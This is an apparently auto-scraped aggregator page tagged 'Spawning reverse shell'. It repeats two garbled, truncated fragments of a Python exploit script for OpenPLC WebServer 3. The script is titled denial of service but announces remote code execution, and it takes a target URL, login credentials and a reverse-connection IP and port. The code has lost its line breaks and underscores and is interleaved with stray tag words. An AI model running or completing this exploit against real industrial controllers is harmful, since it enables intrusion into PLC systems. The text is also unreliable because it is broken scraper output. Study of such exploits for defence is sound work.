comparemela.com
Home
Live Updates
Spawning Reverse Shell - Breaking News
Pages:
Latest Breaking News On - Spawning reverse shell - Page 1 : comparemela.com
OpenPLC WebServer 3 Denial Of Service - KizzMyAnthia com
# Exploit Title: OpenPLC WebServer 3 - Denial of Service# Date: 10.09.2023# Exploit Author: Kai Feng# Vendor Homepage: https://autonomylogic.com/# Software Link: https://github.com/thiagoralves/OpenPLC v3.git# Version: Version 3 and 2# Tested on: Ubuntu 20.04import requestsimport sysimport timeimport optparseimport reparser = optparse.OptionParser()parser.add option('-u', ' url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)")parser.add option('-l', ' user', action="store", dest="user", help="User credential to login")parser.add option('-p', ' passw', action="store",
Kai feng
Software link
Denial of service
Exploit title
Exploit author
Vendor homepage
Remote code execution
Upload programrn
Spawning reverse shell
OpenPLC Webserver 3 Denial Of Service / Buffer Overflow
import requestsimport sysimport timeimport optparseimport reparser = optparse.OptionParser()parser.add option('-u', ' url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)")parser.add option('-l', ' user', action="store", dest="user", help="User credential to login")parser.add option('-p', ' passw', action="store", dest="passw", help="Pass credential to login")parser.add option('-i', ' rip', action="store", dest="rip", help="IP for Reverse Connection")parser.add option('-r', ' rport', action="store", dest="rport", help="Port for Reverse Connection")options, args = parser.parse args()if not options.url:print('[+] Remote Code Execution on OpenPLC v3 WebServer')print('[+]
Remote code execution
Upload programrn
Spawning reverse shell
vimarsana © 2020. All Rights Reserved.